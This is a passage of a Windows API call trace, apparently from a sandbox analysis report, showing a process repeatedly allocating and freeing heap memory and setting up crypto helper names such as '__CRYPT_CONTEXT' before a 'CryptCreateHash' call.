(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0074.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0074.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0074.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0074.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0074.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0074.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0074.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0074.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0074.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0074.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0074.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0074.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0074.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0074.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0074.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0074.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0074.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0074.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0074.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0074.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0074.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0074.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0074.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0074.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0074.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0074.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0074.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0074.802] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0074.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0074.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0074.802] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0074.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0074.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0074.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0074.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0074.802] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0074.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0074.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0074.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0074.803] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0074.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0074.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0074.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0074.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0074.803] PeekMessageW (in: lpMsg=0x144e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e734) returned 0 [0074.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0074.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0074.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0074.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0074.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0074.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0074.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0074.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0074.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0074.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0074.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0074.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0074.803] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0074.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0074.803] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0074.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0074.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0074.803] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0074.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0074.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0074.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0074.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9020 [0074.803] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0074.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0074.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0074.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0074.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0074.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0074.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0074.804] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0074.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9020 | out: hHeap=0x1780000) returned 1 [0074.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0074.804] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0074.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0074.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0074.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0074.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0074.807] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0074.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0074.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0074.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0074.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0074.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0074.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0074.807] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0074.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0074.807] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0074.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0074.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0074.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0074.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0074.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0074.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0074.807] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0074.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0074.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0074.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0074.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9020 [0074.808] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0074.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0074.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0074.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0074.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0074.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9020 | out: hHeap=0x1780000) returned 1 [0074.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0074.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0074.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0074.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0074.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0074.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0074.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0074.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0074.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0074.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0074.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0074.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0074.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0074.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0074.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0074.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0074.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0074.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0074.808] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0074.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0074.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0074.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0074.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0074.808] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0074.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0074.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0074.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0074.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0074.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0074.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0074.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0074.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0074.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0074.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0074.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0074.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0074.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0074.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0074.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0074.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0074.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0074.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0074.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0074.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0074.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0074.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0074.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0074.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0074.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0074.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0074.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0074.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0074.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0074.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0074.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0074.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0074.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0074.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0074.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0074.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0074.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0074.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0074.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0074.810] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0074.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0074.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0074.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0074.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0074.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0074.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0074.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0074.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0074.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0074.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0074.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0074.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0074.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0074.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0074.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0074.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0074.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0074.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0074.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0074.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0074.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0074.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0074.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0074.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0074.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0074.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0074.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0074.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0074.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0074.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0074.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0074.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0074.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0074.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0074.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0074.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0074.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0074.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0074.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0074.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0074.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0074.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0074.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0074.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0074.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0074.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0074.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0074.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0074.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0074.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0074.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0074.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0074.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0074.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0074.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0074.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0074.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0074.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca4f0, cbMultiByte=16, 